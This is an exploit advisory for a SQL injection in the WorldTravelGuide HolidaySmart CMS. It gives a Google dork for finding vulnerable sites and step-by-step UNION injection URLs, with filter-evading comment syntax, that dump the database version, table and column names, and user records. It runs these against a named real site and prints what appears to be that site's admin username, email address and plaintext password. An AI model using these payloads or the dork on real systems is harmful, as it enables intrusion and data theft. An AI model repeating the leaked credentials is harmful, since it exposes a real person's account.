#################################################################################################
# Exploit Title : Powered By WorldTravelGuide HolidaySmart CMS SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/07/2018
# Vendor Homepages : worldtravelguide.net ~ holidaysmart.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : inurl:''/cms.php?id='' site:af
# Exploit : /cms.php?id=[SQL Inj]
# Manually SQL Injection Exploit Checked [ Example Site => airgateway.af ]
Here is the SQL Inj Attack Scenario =>
127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,version(),3,4,5,6,7,8--%20-
Information appears on the page => 5.6.39-83.1
127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(table_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.tables+where+table_schema=database()--%20-
Information appears on the page => categories,client_contact,gallery,links,misc,news,news_letter,order_products,order_reply,orders,pages,product_to_categories,products,products_images,slideshow,users
127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(column_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.columns+where+table_name=0x7573657273--%20-
Information appears on the page => user_id,user_name,user_email,user_pswd,user_fname,user_address,user_phone,user_dob,user_m_status,user_kids,user_pic,user_pic_status,user_city,user_country,user_create,user_last_login,user_status,user_ac_status,total_login,user_login_status
127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(user_name,0x3a,user_email,0x3a,user_pswd)*/,3,4,5,6,7,8+/*!50000from*/+users--%20-
Information appears on the page [ Admin username - Admin E-Mail Address - Admin Password ] => roheenkhan:roheen@airgateway.af:j414H8J3wFc
#################################################################################################
# Example Site => airgateway.af/cms.php?id=-6
# [ Proof of Concepts for SQL Inj ] =>
airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,version(),3,4,5,6,7,8--%20-
Proof => archive.is/Pr4uO
airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(table_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.tables+where+table_schema=database()--%20-
Proof => archive.is/FLokd
airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(column_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.columns+where+table_name=0x7573657273--%20-
Proof => archive.is/8wHLE
airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(user_name,0x3a,user_email,0x3a,user_pswd)*/,3,4,5,6,7,8+/*!50000from*/+users--%20-
Proof => archive.is/Shksx
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################